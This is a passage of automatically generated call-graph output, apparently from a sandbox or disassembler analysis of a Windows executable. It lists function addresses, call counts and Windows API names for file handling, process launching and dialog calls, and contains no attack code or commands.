calls 27035->27042 27037 7ff6373a6b03 27051 7ff637391fa0 31 API calls 27037->27051 27056 7ff6373a6b15 BuildCatchObjectHelperInternal 27037->27056 27113 7ff637392004 33 API calls std::_Xinvalid_argument 27039->27113 27048 7ff6373a70b7 27041->27048 27049 7ff6373a70db 27042->27049 27043 7ff6373a70a6 27047 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27043->27047 27044 7ff6373a6f56 27110 7ff6373911cc 33 API calls BuildCatchObjectHelperInternal 27044->27110 27046 7ff637391fa0 31 API calls 27046->27088 27047->27054 27059 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27048->27059 27061 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27049->27061 27055 7ff63739129c 33 API calls 27050->27055 27050->27088 27051->27056 27053 7ff6373a70c3 27058 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27053->27058 27112 7ff637392004 33 API calls std::_Xinvalid_argument 27054->27112 27062 7ff6373a6bbe 27055->27062 27056->27046 27057 7ff6373a6f69 27111 7ff6373a57ac 33 API calls BuildCatchObjectHelperInternal 27057->27111 27064 7ff6373a70c9 27058->27064 27059->27039 27060 7ff637391fa0 31 API calls 27072 7ff6373a6df5 27060->27072 27066 7ff6373a70e1 27061->27066 27105 7ff6373a5820 33 API calls 27062->27105 27114 7ff63739704c 47 API calls BuildCatchObjectHelperInternal 27064->27114 27065 7ff6373a6d76 BuildCatchObjectHelperInternal 27065->27053 27065->27060 27068 7ff6373a6bd3 27106 7ff63739e164 33 API calls 2 library calls 27068->27106 27071 7ff637391fa0 31 API calls 27074 7ff6373a6fec 27071->27074 27075 7ff6373a6e21 27072->27075 27108 7ff637391744 33 API calls 4 library calls 27072->27108 27073 7ff6373a6f79 BuildCatchObjectHelperInternal 27073->27049 27073->27071 27076 7ff637391fa0 31 API calls 27074->27076 27075->27064 27080 7ff63739129c 33 API calls 27075->27080 27079 7ff6373a6ff6 27076->27079 27078 7ff637391fa0 31 API calls 27082 7ff6373a6c6d 27078->27082 27083 7ff637391fa0 31 API calls 27079->27083 27084 7ff6373a6ec2 27080->27084 27081 7ff6373a6be9 BuildCatchObjectHelperInternal 27081->27048 27081->27078 27085 7ff637391fa0 31 API calls 27082->27085 27083->27088 27086 7ff637392034 33 API calls 27084->27086 27085->27088 27087 7ff6373a6edf 27086->27087 27089 7ff637391fa0 31 API calls 27087->27089 27088->27030 27088->27031 27088->27035 27088->27043 27089->27088 27091 7ff6373a3d5e SetFileAttributesW 27090->27091 27092 7ff6373a3d5b 27090->27092 27093 7ff6373a3d74 27091->27093 27100 7ff6373a3df5 27091->27100 27092->27091 27095 7ff6373a6a0c 49 API calls 27093->27095 27094 7ff6373c2320 _handle_error 8 API calls 27096 7ff6373a3e0a 27094->27096 27097 7ff6373a3d99 27095->27097 27096->26991 27098 7ff6373a3d9d SetFileAttributesW 27097->27098 27099 7ff6373a3dbc 27097->27099 27098->27099 27099->27100 27101 7ff6373a3e1a 27099->27101 27100->27094 27102 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27101->27102 27103 7ff6373a3e1f 27102->27103 27104->27037 27105->27068 27106->27081 27107->27065 27108->27075 27109->27044 27110->27057 27111->27073 27114->27033 27117 7ff637397206 27116->27117 27118 7ff63739713b 27116->27118 27126 7ff63739704c 47 API calls BuildCatchObjectHelperInternal 27117->27126 27124 7ff63739714b BuildCatchObjectHelperInternal 27118->27124 27125 7ff637393f48 33 API calls 2 library calls 27118->27125 27121 7ff63739720b 27122 7ff637397273 27121->27122 27127 7ff63739889c 8 API calls BuildCatchObjectHelperInternal 27121->27127 27122->26484 27124->26484 27125->27124 27126->27121 27127->27121 27129 7ff6373a20ea 27128->27129 27130 7ff6373a2102 27128->27130 27129->27130 27132 7ff6373a20f6 CloseHandle 27129->27132 27131 7ff6373a2126 27130->27131 27134 7ff63739b544 99 API calls 27130->27134 27131->26508 27132->27130 27134->27131 27136 7ff6373baa2f 27135->27136 27137 7ff6373baa36 27135->27137 27136->26659 27137->27136 27275 7ff637391744 33 API calls 4 library calls 27137->27275 27139->26659 27141 7ff6373ba47f 27140->27141 27142 7ff6373ba706 27140->27142 27276 7ff6373bcdf8 33 API calls 27141->27276 27144 7ff6373c2320 _handle_error 8 API calls 27142->27144 27146 7ff6373ba717 27144->27146 27145 7ff6373ba49e 27147 7ff63739129c 33 API calls 27145->27147 27146->26593 27148 7ff6373ba4de 27147->27148 27149 7ff63739129c 33 API calls 27148->27149 27150 7ff6373ba517 27149->27150 27151 7ff63739129c 33 API calls 27150->27151 27152 7ff6373ba54a 27151->27152 27277 7ff6373ba834 33 API calls _invalid_parameter_noinfo_noreturn 27152->27277 27154 7ff6373ba734 27155 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27154->27155 27156 7ff6373ba73a 27155->27156 27157 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27156->27157 27158 7ff6373ba740 27157->27158 27160 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27158->27160 27159 7ff6373ba573 27159->27154 27159->27156 27159->27158 27161 7ff6373920b0 33 API calls 27159->27161 27163 7ff6373ba685 27159->27163 27162 7ff6373ba746 27160->27162 27161->27163 27165 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27162->27165 27163->27142 27163->27162 27164 7ff6373ba72f 27163->27164 27167 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27164->27167 27166 7ff6373ba74c 27165->27166 27168 7ff63739255c 61 API calls 27166->27168 27167->27154 27169 7ff6373ba795 27168->27169 27170 7ff6373ba7b1 27169->27170 27171 7ff6373ba801 SetDlgItemTextW 27169->27171 27175 7ff6373ba7a1 27169->27175 27172 7ff6373c2320 _handle_error 8 API calls 27170->27172 27171->27170 27173 7ff6373ba827 27172->27173 27173->26593 27174 7ff6373ba7ad 27174->27170 27176 7ff6373ba7b7 EndDialog 27174->27176 27175->27170 27175->27174 27278 7ff6373abb00 102 API calls 27175->27278 27176->27170 27185 7ff6373bf529 memcpy_s 27178->27185 27193 7ff6373bf87d 27178->27193 27179 7ff637391fa0 31 API calls 27180 7ff6373bf89c 27179->27180 27181 7ff6373c2320 _handle_error 8 API calls 27180->27181 27182 7ff6373bf8a8 27181->27182 27182->26602 27183 7ff6373bf684 27186 7ff63739129c 33 API calls 27183->27186 27185->27183 27279 7ff6373b13c4 CompareStringW 27185->27279 27187 7ff6373bf6c0 27186->27187 27188 7ff6373a32a8 51 API calls 27187->27188 27189 7ff6373bf6ca 27188->27189 27190 7ff637391fa0 31 API calls 27189->27190 27194 7ff6373bf6d5 27190->27194 27191 7ff6373bf742 ShellExecuteExW 27192 7ff6373bf846 27191->27192 27199 7ff6373bf755 27191->27199 27192->27193 27197 7ff6373bf8fb 27192->27197 27193->27179 27194->27191 27196 7ff63739129c 33 API calls 27194->27196 27195 7ff6373bf78e 27281 7ff6373bfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27195->27281 27200 7ff6373bf717 27196->27200 27202 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27197->27202 27198 7ff6373bf7e3 CloseHandle 27203 7ff6373bf801 27198->27203 27204 7ff6373bf7f2 27198->27204 27199->27195 27199->27198 27209 7ff6373bf781 ShowWindow 27199->27209 27280 7ff6373a5b60 53 API calls 2 library calls 27200->27280 27207 7ff6373bf900 27202->27207 27203->27192 27213 7ff6373bf837 ShowWindow 27203->27213 27282 7ff6373b13c4 CompareStringW 27204->27282 27206 7ff6373bf725 27211 7ff637391fa0 31 API calls 27206->27211 27209->27195 27210 7ff6373bf7a6 27210->27198 27214 7ff6373bf7b4 GetExitCodeProcess 27210->27214 27212 7ff6373bf72f 27211->27212 27212->27191 27213->27192 27214->27198 27215 7ff6373bf7c7 27214->27215 27215->27198 27216->26659 27217->26659 27218->26659 27219->26659 27220->26659 27221->26659 27222->26659 27223->26659 27224->26659 27225->26659 27227 7ff6373a72ea 27226->27227 27283 7ff63739b3a8 27227->27283 27230->26659 27232 7ff6373a31e4 27231->27232 27233 7ff6373a31e7 DeleteFileW 27231->27233 27232->27233 27234 7ff6373a31fd 27233->27234 27241 7ff6373a327c 27233->27241 27236 7ff6373a6a0c 49 API calls 27234->27236 27235 7ff6373c2320 _handle_error 8 API calls 27237 7ff6373a3291 27235->27237 27238 7ff6373a3222 27236->27238 27237->26659 27239 7ff6373a3243 27238->27239 27240 7ff6373a3226 DeleteFileW 27238->27240 27239->27241 27242 7ff6373a32a1 27239->27242 27240->27239 27241->27235 27243 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27242->27243 27244 7ff6373a32a6 27243->27244 27246->26659 27247->26659 27248->26659 27249->26659 27251 7ff6373a7e0c 27250->27251 27252 7ff6373a7e23 27251->27252 27253 7ff6373a7e55 27251->27253 27256 7ff63739129c 33 API calls 27252->27256 27287 7ff63739704c 47 API calls BuildCatchObjectHelperInternal 27253->27287 27255 7ff6373a7e5a 27257 7ff6373a7e47 27256->27257 27257->26659 27258->26659 27259->26659 27261 7ff6373ad25e 27260->27261 27262 7ff6373ad292 27261->27262 27263 7ff637391744 33 API calls 27261->27263 27262->26648 27263->27261 27264->26550 27265->26538 27267->26518 27268->26522 27269->26525 27270->26580 27271->26566 27273->26570 27275->27137 27276->27145 27277->27159 27278->27174 27279->27183 27280->27206 27281->27210 27282->27203 27286 7ff63739b3f2 memcpy_s 27283->27286 27284 7ff6373c2320 _handle_error 8 API calls 27285 7ff63739b4b6 27284->27285 27285->26659 27286->27284 27287->27255 27344 7ff6373a86ec 27288->27344 27290 7ff63739e3c4 27350 7ff63739e600 27290->27350 27292 7ff63739e4d4 27295 7ff6373c21d0 33 API calls 27292->27295 27293 7ff63739e549 27296 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27293->27296 27294 7ff63739e454 27294->27292 27294->27293 27297 7ff63739e4f0 27295->27297 27305 7ff63739e54e 27296->27305 27356 7ff6373b3148 102 API calls 27297->27356 27299 7ff63739e51d 27300 7ff6373c2320 _handle_error 8 API calls 27299->27300 27301 7ff63739e52d 27300->27301 27301->26667 27302 7ff6373a18c2 27304 7ff6373a190d 27302->27304 27306 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27302->27306 27303 7ff637391fa0 31 API calls 27303->27305 27304->26667 27305->27302 27305->27303 27305->27304 27307 7ff6373a193b 27306->27307 27309 7ff63739e7ea 27308->27309 27310 7ff63739e864 27309->27310 27312 7ff63739e8a1 27309->27312 27357 7ff6373a3ec8 27309->27357 27310->27312 27313 7ff63739e993 27310->27313 27319 7ff63739e900 27312->27319 27364 7ff63739f578 27312->27364 27314 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27313->27314 27316 7ff63739e998 27314->27316 27315 7ff6373c2320 _handle_error 8 API calls 27318 7ff63739e97e 27315->27318 27322 7ff63739e578 27318->27322 27321 7ff63739e955 27319->27321 27400 7ff6373928a4 82 API calls 2 library calls 27319->27400 27321->27315 28424 7ff6373a15d8 27322->28424 27325 7ff63739e59e 27327 7ff637391fa0 31 API calls 27325->27327 27326 7ff6373b1870 108 API calls 27326->27325 27328 7ff63739e5b7 27327->27328 27329 7ff637391fa0 31 API calls 27328->27329 27330 7ff63739e5c3 27329->27330 27331 7ff637391fa0 31 API calls 27330->27331 27332 7ff63739e5cf 27331->27332 27333 7ff6373a878c 108 API calls 27332->27333 27334 7ff63739e5db 27333->27334 27335 7ff637391fa0 31 API calls 27334->27335 27336 7ff63739e5e4 27335->27336 27337 7ff637391fa0 31 API calls 27336->27337 27340 7ff63739e5ed 27337->27340 27338 7ff6373a18c2 27339 7ff6373a190d 27338->27339 27342 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27338->27342 27339->26671 27340->27338 27340->27339 27341 7ff637391fa0 31 API calls 27340->27341 27341->27340 27343 7ff6373a193b 27342->27343 27345 7ff6373a870a 27344->27345 27346 7ff6373c21d0 33 API calls 27345->27346 27347 7ff6373a872f 27346->27347 27348 7ff6373c21d0 33 API calls 27347->27348 27349 7ff6373a8759 27348->27349 27349->27290 27351 7ff63739e627 27350->27351 27353 7ff63739e62c BuildCatchObjectHelperInternal 27350->27353 27352 7ff637391fa0 31 API calls 27351->27352 27352->27353 27354 7ff637391fa0 31 API calls 27353->27354 27355 7ff63739e668 BuildCatchObjectHelperInternal 27353->27355 27354->27355 27355->27294 27356->27299 27358 7ff6373a72cc 8 API calls 27357->27358 27359 7ff6373a3ee1 27358->27359 27360 7ff6373a3f0f 27359->27360 27401 7ff6373a40bc 27359->27401 27360->27309 27363 7ff6373a3efa FindClose 27363->27360 27365 7ff63739f598 _snwprintf 27364->27365 27440 7ff637392950 27365->27440 27368 7ff63739f5cc 27372 7ff63739f5fc 27368->27372 27455 7ff6373933e4 27368->27455 27371 7ff63739f5f8 27371->27372 27487 7ff637393ad8 27371->27487 27706 7ff637392c54 27372->27706 27379 7ff63739f7cb 27497 7ff63739f8a4 27379->27497 27380 7ff637398d04 33 API calls 27382 7ff63739f662 27380->27382 27726 7ff6373a7918 48 API calls 2 library calls 27382->27726 27384 7ff63739f677 27385 7ff6373a3ec8 55 API calls 27384->27385 27392 7ff63739f6ad 27385->27392 27387 7ff63739f842 27387->27372 27518 7ff6373969f8 27387->27518 27529 7ff63739f930 27387->27529 27393 7ff63739f89a 27392->27393 27394 7ff63739f74d 27392->27394 27395 7ff6373a3ec8 55 API calls 27392->27395 27727 7ff6373a7918 48 API calls 2 library calls 27392->27727 27396 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27393->27396 27394->27379 27394->27393 27397 7ff63739f895 27394->27397 27395->27392 27399 7ff63739f8a0 27396->27399 27398 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27397->27398 27398->27393 27400->27321 27402 7ff6373a41d2 FindNextFileW 27401->27402 27403 7ff6373a40f9 FindFirstFileW 27401->27403 27405 7ff6373a41e1 GetLastError 27402->27405 27406 7ff6373a41f3 27402->27406 27403->27406 27407 7ff6373a411e 27403->27407 27426 7ff6373a41c0 27405->27426 27408 7ff6373a4211 27406->27408 27411 7ff6373920b0 33 API calls 27406->27411 27409 7ff6373a6a0c 49 API calls 27407->27409 27416 7ff63739129c 33 API calls 27408->27416 27410 7ff6373a4144 27409->27410 27413 7ff6373a4167 27410->27413 27414 7ff6373a4148 FindFirstFileW 27410->27414 27411->27408 27412 7ff6373c2320 _handle_error 8 API calls 27415 7ff6373a3ef4 27412->27415 27413->27406 27418 7ff6373a41af GetLastError 27413->27418 27421 7ff6373a4314 27413->27421 27414->27413 27415->27360 27415->27363 27417 7ff6373a423b 27416->27417 27427 7ff6373a8090 27417->27427 27418->27426 27422 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27421->27422 27423 7ff6373a431a 27422->27423 27424 7ff6373a430f 27425 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27424->27425 27425->27421 27426->27412 27428 7ff6373a80a5 27427->27428 27431 7ff6373a8188 27428->27431 27430 7ff6373a4249 27430->27424 27430->27426 27432 7ff6373a8326 27431->27432 27433 7ff6373a81ba 27431->27433 27439 7ff63739704c 47 API calls BuildCatchObjectHelperInternal 27432->27439 27437 7ff6373a81d4 BuildCatchObjectHelperInternal 27433->27437 27438 7ff6373a58a4 33 API calls 2 library calls 27433->27438 27435 7ff6373a832b 27437->27430 27438->27437 27439->27435 27441 7ff63739296c 27440->27441 27442 7ff6373a86ec 33 API calls 27441->27442 27443 7ff63739298d 27442->27443 27444 7ff6373c21d0 33 API calls 27443->27444 27447 7ff637392ac2 27443->27447 27445 7ff637392ab0 27444->27445 27445->27447 27728 7ff6373991c8 27445->27728 27735 7ff6373a4d04 27447->27735 27450 7ff6373a2ca8 27767 7ff6373a24c0 27450->27767 27452 7ff6373a2cc5 27452->27368 27786 7ff6373a28d0 27455->27786 27456 7ff63739344e 27457 7ff637393674 27456->27457 27463 7ff637393682 27456->27463 27805 7ff6373928a4 82 API calls 2 library calls 27457->27805 27458 7ff637393431 memcpy_s 27458->27456 27460 7ff637393601 27458->27460 27791 7ff6373a2bb0 27458->27791 27460->27371 27461 7ff6373969f8 141 API calls 27461->27463 27463->27460 27463->27461 27465 7ff63739370c 27463->27465 27485 7ff6373a2aa0 101 API calls 27463->27485 27464 7ff637393740 27464->27460 27468 7ff63739384d 27464->27468 27486 7ff6373a2bb0 101 API calls 27464->27486 27465->27460 27465->27464 27806 7ff6373928a4 82 API calls 2 library calls 27465->27806 27467 7ff6373935d7 27467->27460 27470 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27467->27470 27468->27460 27473 7ff6373920b0 33 API calls 27468->27473 27469 7ff6373935cb 27469->27456 27469->27467 27471 7ff637393891 27470->27471 27471->27371 27472 7ff6373934eb 27472->27469 27800 7ff6373a2aa0 27472->27800 27473->27460 27474 7ff6373969f8 141 API calls 27476 7ff63739378e 27474->27476 27476->27474 27477 7ff637393803 27476->27477 27479 7ff6373a2aa0 101 API calls 27476->27479 27481 7ff6373a2aa0 101 API calls 27477->27481 27478 7ff6373a28d0 104 API calls 27478->27469 27479->27476 27481->27468 27484 7ff6373a28d0 104 API calls 27484->27472 27485->27463 27486->27476 27488 7ff637393af9 27487->27488 27493 7ff637393b55 27487->27493 27818 7ff637393378 27488->27818 27489 7ff6373c2320 _handle_error 8 API calls 27491 7ff637393b67 27489->27491 27491->27379 27491->27380 27493->27489 27494 7ff637393b6c 27495 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27494->27495 27496 7ff637393b71 27495->27496 28041 7ff6373a886c 27497->28041 27499 7ff63739f8ba 28045 7ff6373aef60 GetSystemTime SystemTimeToFileTime 27499->28045 27502 7ff6373b0994 27503 7ff6373c0340 27502->27503 27504 7ff6373a7df4 47 API calls 27503->27504 27505 7ff6373c0373 27504->27505 27506 7ff6373aaae0 48 API calls 27505->27506 27507 7ff6373c0387 27506->27507 27508 7ff6373ada98 48 API calls 27507->27508 27509 7ff6373c0397 27508->27509 27510 7ff637391fa0 31 API calls 27509->27510 27511 7ff6373c03a2 27510->27511 28054 7ff6373bfc68 27511->28054 27519 7ff637396a0e 27518->27519 27520 7ff637396a0a 27518->27520 27528 7ff6373a2bb0 101 API calls 27519->27528 27520->27387 27521 7ff637396a1b 27522 7ff637396a3e 27521->27522 27523 7ff637396a2f 27521->27523 28149 7ff637395130 139 API calls 2 library calls 27522->28149 27523->27520 28066 7ff637395e24 27523->28066 27526 7ff637396a3c 27526->27520 28150 7ff63739466c 82 API calls 27526->28150 27528->27521 27530 7ff63739f978 27529->27530 27536 7ff63739f9b0 27530->27536 27590 7ff63739fa34 27530->27590 28266 7ff6373b612c 146 API calls 3 library calls 27530->28266 27531 7ff6373a1189 27534 7ff6373a118e 27531->27534 27535 7ff6373a11e1 27531->27535 27533 7ff6373c2320 _handle_error 8 API calls 27537 7ff6373a11c4 27533->27537 27534->27590 28315 7ff63739dd08 179 API calls 27534->28315 27535->27590 28316 7ff6373b612c 146 API calls 3 library calls 27535->28316 27536->27531 27539 7ff63739f9d0 27536->27539 27536->27590 27537->27387 27539->27590 28187 7ff637399bb0 27539->28187 27542 7ff63739fad6 28200 7ff6373a5ef8 27542->28200 27590->27533 27707 7ff637392c74 27706->27707 27708 7ff637392c88 27706->27708 27707->27708 28403 7ff637392d80 108 API calls _invalid_parameter_noinfo_noreturn 27707->28403 27709 7ff637391fa0 31 API calls 27708->27709 27713 7ff637392ca1 27709->27713 27712 7ff637392d64 27715 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27712->27715 27713->27712 28404 7ff637393090 31 API calls _invalid_parameter_noinfo_noreturn 27713->28404 27714 7ff637392d08 28405 7ff637393090 31 API calls _invalid_parameter_noinfo_noreturn 27714->28405 27717 7ff637392d7c 27715->27717 27718 7ff637392d14 27719 7ff637391fa0 31 API calls 27718->27719 27720 7ff637392d20 27719->27720 28406 7ff6373a878c 27720->28406 27726->27384 27727->27392 27745 7ff6373a56a4 27728->27745 27730 7ff6373991df 27748 7ff6373ab788 27730->27748 27734 7ff637399383 27734->27447 27736 7ff6373a4d32 memcpy_s 27735->27736 27763 7ff6373a4bac 27736->27763 27738 7ff6373a4d54 27739 7ff6373a4d90 27738->27739 27742 7ff6373a4dae 27738->27742 27740 7ff6373c2320 _handle_error 8 API calls 27739->27740 27741 7ff637392b32 27740->27741 27741->27368 27741->27450 27743 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27742->27743 27744 7ff6373a4db3 27743->27744 27754 7ff6373a56e8 27745->27754 27749 7ff6373913a4 33 API calls 27748->27749 27750 7ff637399365 27749->27750 27751 7ff637399a28 27750->27751 27752 7ff6373a56e8 2 API calls 27751->27752 27753 7ff637399a36 27752->27753 27753->27734 27755 7ff6373a56fe memcpy_s 27754->27755 27758 7ff6373aeba4 27755->27758 27761 7ff6373aeb58 GetCurrentProcess GetProcessAffinityMask 27758->27761 27762 7ff6373a56de 27761->27762 27762->27730 27764 7ff6373a4c27 27763->27764 27766 7ff6373a4c2f BuildCatchObjectHelperInternal 27763->27766 27765 7ff637391fa0 31 API calls 27764->27765 27765->27766 27766->27738 27768 7ff6373a24fd CreateFileW 27767->27768 27770 7ff6373a25ae GetLastError 27768->27770 27779 7ff6373a266e 27768->27779 27771 7ff6373a6a0c 49 API calls 27770->27771 27772 7ff6373a25dc 27771->27772 27773 7ff6373a25e0 CreateFileW GetLastError 27772->27773 27780 7ff6373a262c 27772->27780 27773->27780 27774 7ff6373a26b1 SetFileTime 27778 7ff6373a26cf 27774->27778 27775 7ff6373a2708 27776 7ff6373c2320 _handle_error 8 API calls 27775->27776 27777 7ff6373a271b 27776->27777 27777->27452 27785 7ff63739b7e8 99 API calls 2 library calls 27777->27785 27778->27775 27781 7ff6373920b0 33 API calls 27778->27781 27779->27774 27779->27778 27780->27779 27782 7ff6373a2736 27780->27782 27781->27775 27783 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27782->27783 27784 7ff6373a273b 27783->27784 27785->27452 27787 7ff6373a28f6 27786->27787 27789 7ff6373a28fd 27786->27789 27787->27458 27789->27787 27790 7ff6373a2320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27789->27790 27807 7ff63739b8a4 99 API calls Concurrency::cancel_current_task 27789->27807 27790->27789 27792 7ff6373a2be9 27791->27792 27793 7ff6373a2bcd 27791->27793 27794 7ff6373934cc 27792->27794 27795 7ff6373a2c01 SetFilePointer 27792->27795 27793->27794 27808 7ff63739b9c4 99 API calls Concurrency::cancel_current_task 27793->27808 27794->27484 27795->27794 27797 7ff6373a2c1e GetLastError 27795->27797 27797->27794 27798 7ff6373a2c28 27797->27798 27798->27794 27809 7ff63739b9c4 99 API calls Concurrency::cancel_current_task 27798->27809 27810 7ff6373a2778 27800->27810 27803 7ff6373935a7 27803->27469 27803->27478 27805->27460 27806->27464 27816 7ff6373a2789 _snwprintf 27810->27816 27811 7ff6373a27b5 27813 7ff6373c2320 _handle_error 8 API calls 27811->27813 27812 7ff6373a2890 SetFilePointer 27812->27811 27815 7ff6373a28b8 GetLastError 27812->27815 27814 7ff6373a281d 27813->27814 27814->27803 27817 7ff63739b9c4 99 API calls Concurrency::cancel_current_task 27814->27817 27815->27811 27816->27811 27816->27812 27819 7ff63739339a 27818->27819 27822 7ff637393396 27818->27822 27824 7ff637393294 27819->27824 27822->27493 27822->27494 27823 7ff6373a2aa0 101 API calls 27823->27822 27825 7ff6373932bb 27824->27825 27827 7ff6373932f6 27824->27827 27826 7ff6373969f8 141 API calls 27825->27826 27831 7ff6373932db 27826->27831 27832 7ff637396e74 27827->27832 27831->27823 27836 7ff637396e95 27832->27836 27833 7ff6373969f8 141 API calls 27833->27836 27834 7ff63739331d 27834->27831 27837 7ff637393904 27834->27837 27836->27833 27836->27834 27864 7ff6373ae808 27836->27864 27872 7ff637396a7c 27837->27872 27840 7ff63739396a 27843 7ff637393989 27840->27843 27844 7ff63739399a 27840->27844 27842 7ff637393a8a 27845 7ff6373c2320 _handle_error 8 API calls 27842->27845 27905 7ff6373b0d54 33 API calls 27843->27905 27849 7ff6373939a3 27844->27849 27850 7ff6373939ec 27844->27850 27848 7ff637393a9e 27845->27848 27846 7ff637393ab3 27851 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27846->27851 27848->27831 27906 7ff6373b0c80 33 API calls 27849->27906 27907 7ff6373926b4 33 API calls BuildCatchObjectHelperInternal 27850->27907 27853 7ff637393ab8 27851->27853 27858 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27853->27858 27854 7ff6373939b0 27859 7ff637391fa0 31 API calls 27854->27859 27862 7ff6373939c0 BuildCatchObjectHelperInternal 27854->27862 27856 7ff637391fa0 31 API calls 27863 7ff63739394f 27856->27863 27857 7ff637393a13 27908 7ff6373b0ae8 34 API calls _invalid_parameter_noinfo_noreturn 27857->27908 27861 7ff637393abe 27858->27861 27859->27862 27862->27856 27863->27842 27863->27846 27863->27853 27865 7ff6373ae811 27864->27865 27866 7ff6373ae82b 27865->27866 27870 7ff63739b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27865->27870 27868 7ff6373ae845 SetThreadExecutionState 27866->27868 27871 7ff63739b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27866->27871 27870->27866 27871->27868 27873 7ff637396a96 _snwprintf 27872->27873 27874 7ff637396ae4 27873->27874 27875 7ff637396ac4 27873->27875 27877 7ff637396d4d 27874->27877 27879 7ff637396b0f 27874->27879 27947 7ff6373928a4 82 API calls 2 library calls 27875->27947 27976 7ff6373928a4 82 API calls 2 library calls 27877->27976 27894 7ff637396ad0 27879->27894 27909 7ff6373b1f94 27879->27909 27880 7ff6373c2320 _handle_error 8 API calls 27881 7ff63739394b 27880->27881 27881->27840 27881->27863 27904 7ff637392794 33 API calls __std_swap_ranges_trivially_swappable 27881->27904 27884 7ff637396b85 27885 7ff637396c2a 27884->27885 27903 7ff637396b7b 27884->27903 27953 7ff6373a8968 109 API calls 27884->27953 27918 7ff6373a4760 27885->27918 27886 7ff637396b6e 27948 7ff6373928a4 82 API calls 2 library calls 27886->27948 27887 7ff637396b80 27887->27884 27949 7ff6373940b0 27887->27949 27893 7ff637396c52 27895 7ff637396cd1 27893->27895 27896 7ff637396cc7 27893->27896 27894->27880 27954 7ff6373b1f20 27895->27954 27922 7ff6373a1794 27896->27922 27937 7ff6373b1870 27903->27937 27904->27840 27905->27863 27906->27854 27907->27857 27908->27863 27910 7ff6373b2056 std::bad_alloc::bad_alloc 27909->27910 27913 7ff6373b1fc5 std::bad_alloc::bad_alloc 27909->27913 27912 7ff6373c4078 Concurrency::cancel_current_task 2 API calls 27910->27912 27911 7ff637396b59 27911->27884 27911->27886 27911->27887 27912->27913 27913->27911 27914 7ff6373c4078 Concurrency::cancel_current_task 2 API calls 27913->27914 27915 7ff6373b200f std::bad_alloc::bad_alloc 27913->27915 27914->27915 27915->27911 27916 7ff6373c4078 Concurrency::cancel_current_task 2 API calls 27915->27916 27917 7ff6373b20a9 27916->27917 27919 7ff6373a4780 27918->27919 27921 7ff6373a478a 27918->27921 27920 7ff6373c21d0 33 API calls 27919->27920 27920->27921 27921->27893 27938 7ff6373b188e 27937->27938 27940 7ff6373b18a1 27938->27940 27997 7ff6373ae948 27938->27997 27944 7ff6373b18d8 27940->27944 27993 7ff6373c236c 27940->27993 27946 7ff6373b1a37 27944->27946 28004 7ff6373aa984 31 API calls _invalid_parameter_noinfo_noreturn 27944->28004 27947->27894 27948->27903 27950 7ff6373940dd 27949->27950 27952 7ff6373940d7 memcpy_s 27949->27952 27950->27952 28005 7ff637394120 27950->28005 27952->27884 27953->27885 27976->27894 27995 7ff6373c239f 27993->27995 27998 7ff6373aecd8 103 API calls 27997->27998 27999 7ff6373ae95f ReleaseSemaphore 27998->27999 28004->27946 28006 7ff637394168 memcpy_s __std_swap_ranges_trivially_swappable 28005->28006 28009 7ff637394149 28005->28009 28007 7ff637392018 33 API calls 28006->28007 28008 7ff6373941eb 28007->28008 28009->28006 28010 7ff6373c21d0 33 API calls 28009->28010 28010->28006 28042 7ff6373a8882 28041->28042 28043 7ff6373a8892 28041->28043 28048 7ff6373a23f0 28042->28048 28043->27499 28046 7ff6373c2320 _handle_error 8 API calls 28045->28046 28047 7ff63739f7dc 28046->28047 28047->27387 28047->27502 28049 7ff6373a240f 28048->28049 28053 7ff6373a2aa0 101 API calls 28049->28053 28050 7ff6373a2428 28052 7ff6373a2bb0 101 API calls 28050->28052 28051 7ff6373a2438 28051->28043 28052->28051 28053->28050 28055 7ff6373bfc94 28054->28055 28067 7ff637395e67 28066->28067 28069 7ff637395ea5 28067->28069 28075 7ff637395eb7 28067->28075 28097 7ff637396084 28067->28097 28161 7ff6373928a4 82 API calls 2 library calls 28069->28161 28071 7ff637396134 28168 7ff637396fcc 82 API calls 28071->28168 28073 7ff637395f44 28163 7ff637396d88 82 API calls 28073->28163 28074 7ff6373969af 28075->28071 28075->28073 28162 7ff637396f38 33 API calls BuildCatchObjectHelperInternal 28075->28162 28079 7ff6373969e4 28088 7ff637396034 28088->28097 28090 7ff6373969ef 28151 7ff6373a85f0 28097->28151 28098 7ff637396097 28102 7ff637395f5d 28102->28088 28102->28098 28164 7ff63739433c 82 API calls 2 library calls 28102->28164 28165 7ff637396d88 82 API calls 28102->28165 28112 7ff637395eb2 28112->28074 28112->28079 28112->28090 28149->27526 28152 7ff6373a8614 28151->28152 28153 7ff6373a869a 28151->28153 28154 7ff6373a867c 28152->28154 28155 7ff6373940b0 33 API calls 